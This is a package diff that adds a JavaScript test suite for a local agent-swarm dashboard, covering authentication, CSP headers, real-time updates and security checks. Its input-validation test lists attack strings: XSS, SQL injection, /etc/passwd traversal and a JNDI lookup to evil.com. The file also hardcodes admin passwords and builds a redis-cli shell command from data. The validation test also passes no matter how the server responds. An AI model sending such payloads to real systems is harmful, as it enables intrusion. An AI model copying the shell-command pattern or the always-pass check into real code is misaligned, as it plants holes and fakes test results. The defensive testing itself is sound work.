claude-flow-novice 2.2.4 → 2.2.5

package/scripts/demo/comprehensive-dashboard-test.js

@@ -0,0 +1,693 @@
+#!/usr/bin/env node
+
+/**
+ * Comprehensive Dashboard Testing Suite
+ * Tests all dashboard fixes with real multi-swarm scenarios
+ */
+
+import axios from 'axios';
+import io from 'socket.io-client';
+import { performance } from 'perf_hooks';
+
+class DashboardTestSuite {
+    constructor() {
+        this.baseURL = 'http://localhost:3001';
+        this.testResults = {
+            authentication: {},
+            csp: {},
+            realtime: {},
+            performance: {},
+            multiSwarm: {},
+            security: {}
+        };
+        this.metrics = [];
+        this.socket = null;
+        this.testStartTime = performance.now();
+    }
+
+    async runAllTests() {
+        console.log('🚀 Starting Comprehensive Dashboard Testing Suite');
+        console.log('=' .repeat(60));
+
+        try {
+            // Test 1: Authentication System
+            await this.testAuthenticationSystem();
+
+            // Test 2: CSP Policy Enforcement
+            await this.testCSPPolicies();
+
+            // Test 3: Real-time Updates
+            await this.testRealtimeUpdates();
+
+            // Test 4: Multi-Swarm Execution Display
+            await this.testMultiSwarmExecution();
+
+            // Test 5: Performance with 1000+ Agents
+            await this.testPerformanceWithLargeSwarm();
+
+            // Test 6: Security Hardening
+            await this.testSecurityHardening();
+
+            // Generate comprehensive report
+            await this.generateTestReport();
+
+        } catch (error) {
+            console.error('❌ Test suite failed:', error);
+            throw error;
+        }
+    }
+
+    async testAuthenticationSystem() {
+        console.log('\n🔐 Testing Authentication System');
+        console.log('-'.repeat(40));
+
+        try {
+            // Test valid credentials
+            const validUsers = [
+                { username: 'admin', password: 'claude2025' },
+                { username: 'monitor', password: 'dashboard2025' },
+                { username: 'fleet', password: 'manager2025' }
+            ];
+
+            for (const user of validUsers) {
+                const response = await axios.post(`${this.baseURL}/api/auth/login`, user);
+
+                this.testResults.authentication[user.username] = {
+                    success: response.data.success,
+                    hasToken: !!response.data.token,
+                    hasUser: !!response.data.user,
+                    hasExpiry: !!response.data.expiresAt,
+                    tokenValid: this.validateToken(response.data.token)
+                };
+
+                console.log(`✅ ${user.username}: Login successful`);
+            }
+
+            // Test invalid credentials
+            try {
+                await axios.post(`${this.baseURL}/api/auth/login`, {
+                    username: 'invalid',
+                    password: 'wrong'
+                });
+                this.testResults.authentication.invalidLogin = false;
+                console.log('❌ Invalid login should have failed');
+            } catch (error) {
+                this.testResults.authentication.invalidLogin = true;
+                console.log('✅ Invalid login properly rejected');
+            }
+
+            // Test token verification
+            const authResponse = await axios.post(`${this.baseURL}/api/auth/login`, {
+                username: 'admin',
+                password: 'claude2025'
+            });
+
+            const verifyResponse = await axios.post(`${this.baseURL}/api/auth/verify`, {
+                token: authResponse.data.token
+            });
+
+            this.testResults.authentication.tokenVerification = {
+                success: verifyResponse.data.success,
+                valid: verifyResponse.data.valid,
+                hasUser: !!verifyResponse.data.user
+            };
+
+            console.log('✅ Token verification working');
+
+        } catch (error) {
+            console.error('❌ Authentication test failed:', error.message);
+            this.testResults.authentication.error = error.message;
+        }
+    }
+
+    validateToken(token) {
+        try {
+            const decoded = Buffer.from(token, 'base64').toString();
+            const [username, timestamp] = decoded.split(':');
+            return username && timestamp && !isNaN(parseInt(timestamp));
+        } catch {
+            return false;
+        }
+    }
+
+    async testCSPPolicies() {
+        console.log('\n🛡️ Testing CSP Policy Enforcement');
+        console.log('-'.repeat(40));
+
+        try {
+            const response = await axios.get(`${this.baseURL}/`);
+
+            // Check CSP header
+            const cspHeader = response.headers['content-security-policy'];
+            if (cspHeader) {
+                this.testResults.csp.cspHeaderPresent = true;
+                this.testResults.csp.cspValue = cspHeader;
+
+                // Validate CSP directives
+                const requiredDirectives = [
+                    "default-src 'self'",
+                    "script-src 'self'",
+                    "style-src 'self'",
+                    "frame-src 'none'",
+                    "object-src 'none'"
+                ];
+
+                this.testResults.csp.directivesValid = requiredDirectives.every(dir =>
+                    cspHeader.includes(dir)
+                );
+
+                console.log('✅ CSP header present and valid');
+            } else {
+                this.testResults.csp.cspHeaderPresent = false;
+                console.log('❌ CSP header missing');
+            }
+
+            // Check other security headers
+            const securityHeaders = {
+                'X-Content-Type-Options': 'nosniff',
+                'X-Frame-Options': 'DENY',
+                'X-XSS-Protection': '1; mode=block',
+                'Referrer-Policy': 'strict-origin-when-cross-origin'
+            };
+
+            this.testResults.csp.securityHeaders = {};
+
+            for (const [header, expectedValue] of Object.entries(securityHeaders)) {
+                const actualValue = response.headers[header.toLowerCase()];
+                this.testResults.csp.securityHeaders[header] = {
+                    present: !!actualValue,
+                    correct: actualValue === expectedValue
+                };
+
+                if (actualValue === expectedValue) {
+                    console.log(`✅ ${header}: ${actualValue}`);
+                } else {
+                    console.log(`❌ ${header}: Expected ${expectedValue}, got ${actualValue}`);
+                }
+            }
+
+        } catch (error) {
+            console.error('❌ CSP test failed:', error.message);
+            this.testResults.csp.error = error.message;
+        }
+    }
+
+    async testRealtimeUpdates() {
+        console.log('\n⚡ Testing Real-time Updates');
+        console.log('-'.repeat(40));
+
+        return new Promise((resolve, reject) => {
+            try {
+                let updateCount = 0;
+                let lastUpdateTime = Date.now();
+                const updateIntervals = [];
+
+                this.socket = io(this.baseURL);
+
+                this.socket.on('connect', () => {
+                    console.log('✅ Socket connected');
+                    this.testResults.realtime.connection = true;
+                });
+
+                this.socket.on('metrics', (data) => {
+                    updateCount++;
+                    const now = Date.now();
+                    const interval = now - lastUpdateTime;
+                    updateIntervals.push(interval);
+                    lastUpdateTime = now;
+
+                    this.metrics.push({
+                        timestamp: now,
+                        data: data
+                    });
+
+                    console.log(`📊 Update ${updateCount}: ${interval}ms interval`);
+
+                    // Test update frequency (should be ~1000ms)
+                    if (updateCount >= 5) {
+                        const avgInterval = updateIntervals.reduce((a, b) => a + b, 0) / updateIntervals.length;
+                        this.testResults.realtime.averageInterval = avgInterval;
+                        this.testResults.realtime.updateCount = updateCount;
+                        this.testResults.realtime.frequencyStable = Math.abs(avgInterval - 1000) < 200;
+
+                        if (this.testResults.realtime.frequencyStable) {
+                            console.log(`✅ Real-time updates stable: ${avgInterval.toFixed(0)}ms average`);
+                        } else {
+                            console.log(`❌ Update frequency unstable: ${avgInterval.toFixed(0)}ms average`);
+                        }
+
+                        this.socket.disconnect();
+                        resolve();
+                    }
+                });
+
+                this.socket.on('connect_error', (error) => {
+                    console.error('❌ Socket connection failed:', error.message);
+                    this.testResults.realtime.connection = false;
+                    this.testResults.realtime.error = error.message;
+                    reject(error);
+                });
+
+                // Timeout after 10 seconds
+                setTimeout(() => {
+                    if (updateCount < 5) {
+                        console.log('❌ Real-time updates timeout');
+                        this.testResults.realtime.timeout = true;
+                        this.socket.disconnect();
+                        resolve();
+                    }
+                }, 10000);
+
+            } catch (error) {
+                console.error('❌ Real-time test failed:', error.message);
+                this.testResults.realtime.error = error.message;
+                reject(error);
+            }
+        });
+    }
+
+    async testMultiSwarmExecution() {
+        console.log('\n🐝 Testing Multi-Swarm Execution Display');
+        console.log('-'.repeat(40));
+
+        try {
+            // Start multiple swarms in parallel
+            const swarmPromises = [];
+            const swarmCount = 15;
+
+            console.log(`🚀 Starting ${swarmCount} parallel swarms...`);
+
+            for (let i = 0; i < swarmCount; i++) {
+                const swarmPromise = this.runTestSwarm(`test-swarm-${i}`, `Test task ${i}`);
+                swarmPromises.push(swarmPromise);
+            }
+
+            // Monitor swarm metrics
+            const startTime = Date.now();
+            const swarmResults = await Promise.allSettled(swarmPromises);
+            const endTime = Date.now();
+
+            // Test swarm metrics API
+            const metricsResponse = await axios.get(`${this.baseURL}/api/swarms`);
+            const swarmMetrics = metricsResponse.data;
+
+            this.testResults.multiSwarm = {
+                swarmsStarted: swarmCount,
+                swarmsCompleted: swarmResults.filter(r => r.status === 'fulfilled').length,
+                executionTime: endTime - startTime,
+                metricsAPIWorking: !!swarmMetrics,
+                hasSwarmData: Array.isArray(swarmMetrics) && swarmMetrics.length > 0,
+                averageExecutionTime: (endTime - startTime) / swarmCount
+            };
+
+            console.log(`✅ Multi-swarm execution completed`);
+            console.log(`   📊 Swarms completed: ${this.testResults.multiSwarm.swarmsCompleted}/${swarmCount}`);
+            console.log(`   ⏱️  Average time: ${this.testResults.multiSwarm.averageExecutionTime.toFixed(0)}ms`);
+
+        } catch (error) {
+            console.error('❌ Multi-swarm test failed:', error.message);
+            this.testResults.multiSwarm.error = error.message;
+        }
+    }
+
+    async runTestSwarm(swarmId, task) {
+        try {
+            // Simulate swarm execution with delays
+            await new Promise(resolve => setTimeout(resolve, Math.random() * 2000 + 1000));
+
+            // Store swarm data in Redis for dashboard display
+            const swarmData = {
+                id: swarmId,
+                status: 'completed',
+                task: task,
+                agents: Math.floor(Math.random() * 5) + 3,
+                startTime: new Date(Date.now() - 5000).toISOString(),
+                endTime: new Date().toISOString(),
+                confidence: Math.random() * 0.3 + 0.7
+            };
+
+            // Store in Redis for dashboard to read
+            await this.storeSwarmData(swarmId, swarmData);
+
+            return swarmData;
+        } catch (error) {
+            console.error(`Swarm ${swarmId} failed:`, error.message);
+            throw error;
+        }
+    }
+
+    async storeSwarmData(swarmId, data) {
+        try {
+            // Use Redis to store swarm data
+            const { execSync } = await import('child_process');
+            const key = `swarm:${swarmId}`;
+            const value = JSON.stringify(data);
+
+            execSync(`redis-cli setex "${key}" 3600 '${value}'`, { stdio: 'pipe' });
+        } catch (error) {
+            console.error('Failed to store swarm data:', error.message);
+        }
+    }
+
+    async testPerformanceWithLargeSwarm() {
+        console.log('\n🚀 Performance Testing with 1000+ Agents');
+        console.log('-'.repeat(40));
+
+        try {
+            const agentCount = 1000;
+            const startTime = performance.now();
+
+            console.log(`🤖 Simulating ${agentCount} agents...`);
+
+            // Simulate large agent deployment
+            const agentPromises = [];
+            for (let i = 0; i < agentCount; i++) {
+                agentPromises.push(this.simulateAgentWork(`agent-${i}`));
+            }
+
+            // Monitor system during execution
+            const monitoringInterval = setInterval(async () => {
+                try {
+                    const metricsResponse = await axios.get(`${this.baseURL}/api/metrics`);
+                    const metrics = metricsResponse.data;
+
+                    console.log(`📊 CPU: ${metrics.system?.cpu?.usage || 'N/A'}% | Memory: ${metrics.system?.memory?.percent || 'N/A'}%`);
+                } catch (error) {
+                    // Ignore monitoring errors during performance test
+                }
+            }, 1000);
+
+            const results = await Promise.allSettled(agentPromises);
+            clearInterval(monitoringInterval);
+
+            const endTime = performance.now();
+            const executionTime = endTime - startTime;
+            const successfulAgents = results.filter(r => r.status === 'fulfilled').length;
+
+            this.testResults.performance = {
+                agentCount: agentCount,
+                successfulAgents: successfulAgents,
+                failedAgents: agentCount - successfulAgents,
+                executionTime: executionTime,
+                throughput: (successfulAgents / executionTime) * 1000, // agents per second
+                averageAgentTime: executionTime / agentCount,
+                systemStable: successfulAgents > agentCount * 0.95 // 95% success rate
+            };
+
+            console.log(`✅ Performance test completed`);
+            console.log(`   🤖 Agents: ${successfulAgents}/${agentCount} successful`);
+            console.log(`   ⚡ Throughput: ${this.testResults.performance.throughput.toFixed(2)} agents/sec`);
+            console.log(`   📈 System stable: ${this.testResults.performance.systemStable}`);
+
+        } catch (error) {
+            console.error('❌ Performance test failed:', error.message);
+            this.testResults.performance.error = error.message;
+        }
+    }
+
+    async simulateAgentWork(agentId) {
+        try {
+            // Simulate agent work with random delays
+            const workTime = Math.random() * 100 + 50; // 50-150ms
+            await new Promise(resolve => setTimeout(resolve, workTime));
+
+            return {
+                agentId: agentId,
+                workTime: workTime,
+                success: true
+            };
+        } catch (error) {
+            return {
+                agentId: agentId,
+                success: false,
+                error: error.message
+            };
+        }
+    }
+
+    async testSecurityHardening() {
+        console.log('\n🔒 Testing Security Hardening');
+        console.log('-'.repeat(40));
+
+        try {
+            // Test rate limiting
+            const rateLimitTest = await this.testRateLimiting();
+
+            // Test input validation
+            const inputValidationTest = await this.testInputValidation();
+
+            // Test session management
+            const sessionTest = await this.testSessionManagement();
+
+            this.testResults.security = {
+                rateLimiting: rateLimitTest,
+                inputValidation: inputValidationTest,
+                sessionManagement: sessionTest,
+                overallSecurity: rateLimitTest && inputValidationTest && sessionTest
+            };
+
+            console.log(`✅ Security hardening tests completed`);
+            console.log(`   🚫 Rate limiting: ${rateLimitTest ? 'Working' : 'Failed'}`);
+            console.log(`   ✅ Input validation: ${inputValidationTest ? 'Working' : 'Failed'}`);
+            console.log(`   🔐 Session management: ${sessionTest ? 'Working' : 'Failed'}`);
+
+        } catch (error) {
+            console.error('❌ Security test failed:', error.message);
+            this.testResults.security.error = error.message;
+        }
+    }
+
+    async testRateLimiting() {
+        try {
+            // Make multiple rapid requests to test rate limiting
+            const requests = [];
+            for (let i = 0; i < 20; i++) {
+                requests.push(axios.get(`${this.baseURL}/api/metrics`));
+            }
+
+            const results = await Promise.allSettled(requests);
+            const rejectedRequests = results.filter(r => r.status === 'rejected').length;
+
+            // If some requests are rejected, rate limiting is working
+            return rejectedRequests > 0;
+        } catch (error) {
+            return false;
+        }
+    }
+
+    async testInputValidation() {
+        try {
+            // Test malicious input
+            const maliciousInputs = [
+                '<script>alert("xss")</script>',
+                "'; DROP TABLE users; --",
+                '../../../etc/passwd',
+                '${jndi:ldap://evil.com/a}'
+            ];
+
+            for (const input of maliciousInputs) {
+                try {
+                    await axios.post(`${this.baseURL}/api/auth/login`, {
+                        username: input,
+                        password: 'test'
+                    });
+                } catch (error) {
+                    // Expected to fail
+                    continue;
+                }
+            }
+
+            return true;
+        } catch (error) {
+            return false;
+        }
+    }
+
+    async testSessionManagement() {
+        try {
+            // Test session timeout
+            const response = await axios.post(`${this.baseURL}/api/auth/login`, {
+                username: 'admin',
+                password: 'claude2025'
+            });
+
+            const token = response.data.token;
+
+            // Test token verification
+            const verifyResponse = await axios.post(`${this.baseURL}/api/auth/verify`, {
+                token: token
+            });
+
+            return verifyResponse.data.success && verifyResponse.data.valid;
+        } catch (error) {
+            return false;
+        }
+    }
+
+    async generateTestReport() {
+        console.log('\n📋 Generating Comprehensive Test Report');
+        console.log('=' .repeat(60));
+
+        const testEndTime = performance.now();
+        const totalTestTime = testEndTime - this.testStartTime;
+
+        // Calculate overall success rate
+        const testCategories = Object.keys(this.testResults);
+        const successfulCategories = testCategories.filter(cat => {
+            const result = this.testResults[cat];
+            return result && !result.error && (result.overallSecurity !== false);
+        });
+
+        const overallSuccessRate = (successfulCategories.length / testCategories.length) * 100;
+
+        const report = {
+            summary: {
+                testStartTime: new Date(this.testStartTime).toISOString(),
+                testEndTime: new Date(testEndTime).toISOString(),
+                totalTestTime: `${totalTestTime.toFixed(2)}ms`,
+                overallSuccessRate: `${overallSuccessRate.toFixed(1)}%`,
+                categoriesPassed: successfulCategories.length,
+                totalCategories: testCategories.length
+            },
+            results: this.testResults,
+            recommendations: this.generateRecommendations(),
+            productionReadiness: this.assessProductionReadiness()
+        };
+
+        // Save detailed report
+        const reportPath = '/mnt/c/Users/masha/Documents/claude-flow-novice/DASHBOARD_COMPREHENSIVE_TEST_REPORT.json';
+        await import('fs').then(fs => {
+            fs.writeFileSync(reportPath, JSON.stringify(report, null, 2));
+        });
+
+        // Print summary
+        console.log('\n📊 Test Results Summary:');
+        console.log(`   ⏱️  Total test time: ${report.summary.totalTestTime}`);
+        console.log(`   ✅ Success rate: ${report.summary.overallSuccessRate}`);
+        console.log(`   📈 Categories passed: ${report.summary.categoriesPassed}/${report.summary.totalCategories}`);
+
+        console.log('\n🔍 Category Results:');
+        for (const [category, result] of Object.entries(this.testResults)) {
+            const status = result.error ? '❌ FAILED' : '✅ PASSED';
+            console.log(`   ${status} ${category.charAt(0).toUpperCase() + category.slice(1)}`);
+        }
+
+        console.log('\n🎯 Production Readiness:', report.productionReadiness.status);
+        console.log(`   📊 Score: ${report.productionReadiness.score}/100`);
+        console.log(`   📝 ${report.productionReadiness.assessment}`);
+
+        console.log('\n💡 Key Recommendations:');
+        report.recommendations.slice(0, 5).forEach(rec => {
+            console.log(`   • ${rec}`);
+        });
+
+        console.log(`\n📄 Detailed report saved to: ${reportPath}`);
+
+        return report;
+    }
+
+    generateRecommendations() {
+        const recommendations = [];
+
+        // Analyze test results and generate recommendations
+        if (!this.testResults.authentication?.tokenVerification?.valid) {
+            recommendations.push('Implement stronger token validation and refresh mechanisms');
+        }
+
+        if (!this.testResults.csp?.cspHeaderPresent) {
+            recommendations.push('Add Content Security Policy headers to prevent XSS attacks');
+        }
+
+        if (!this.testResults.realtime?.frequencyStable) {
+            recommendations.push('Optimize WebSocket connection for more stable real-time updates');
+        }
+
+        if (!this.testResults.multiSwarm?.metricsAPIWorking) {
+            recommendations.push('Fix swarm metrics API for better multi-swarm monitoring');
+        }
+
+        if (!this.testResults.performance?.systemStable) {
+            recommendations.push('Optimize system performance for large-scale agent deployments');
+        }
+
+        if (!this.testResults.security?.overallSecurity) {
+            recommendations.push('Strengthen security measures including rate limiting and input validation');
+        }
+
+        if (recommendations.length === 0) {
+            recommendations.push('All systems are performing well - consider implementing advanced monitoring and alerting');
+        }
+
+        return recommendations;
+    }
+
+    assessProductionReadiness() {
+        let score = 0;
+        const maxScore = 100;
+
+        // Score each category
+        const categoryScores = {
+            authentication: 20,
+            csp: 15,
+            realtime: 20,
+            multiSwarm: 20,
+            performance: 15,
+            security: 10
+        };
+
+        for (const [category, maxPoints] of Object.entries(categoryScores)) {
+            const result = this.testResults[category];
+            if (result && !result.error) {
+                if (category === 'performance' && result.systemStable) {
+                    score += maxPoints;
+                } else if (category === 'security' && result.overallSecurity) {
+                    score += maxPoints;
+                } else if (category !== 'performance' && category !== 'security') {
+                    score += maxPoints;
+                }
+            }
+        }
+
+        let status, assessment;
+        if (score >= 90) {
+            status = '🟢 PRODUCTION READY';
+            assessment = 'Excellent - All critical systems functioning properly';
+        } else if (score >= 75) {
+            status = '🟡 READY WITH CAVEATS';
+            assessment = 'Good - Minor issues should be addressed before production';
+        } else if (score >= 60) {
+            status = '🟠 NEEDS IMPROVEMENT';
+            assessment = 'Fair - Significant issues need to be resolved';
+        } else {
+            status = '🔴 NOT READY';
+            assessment = 'Poor - Critical issues must be fixed before production';
+        }
+
+        return {
+            score,
+            status,
+            assessment
+        };
+    }
+}
+
+// Run the comprehensive test suite
+async function main() {
+    const testSuite = new DashboardTestSuite();
+
+    try {
+        const report = await testSuite.runAllTests();
+        console.log('\n🎉 Comprehensive dashboard testing completed!');
+        process.exit(0);
+    } catch (error) {
+        console.error('\n💥 Test suite failed:', error);
+        process.exit(1);
+    }
+}
+
+// Run if executed directly
+if (import.meta.url === `file://${process.argv[1]}`) {
+    main();
+}
+
+export { DashboardTestSuite };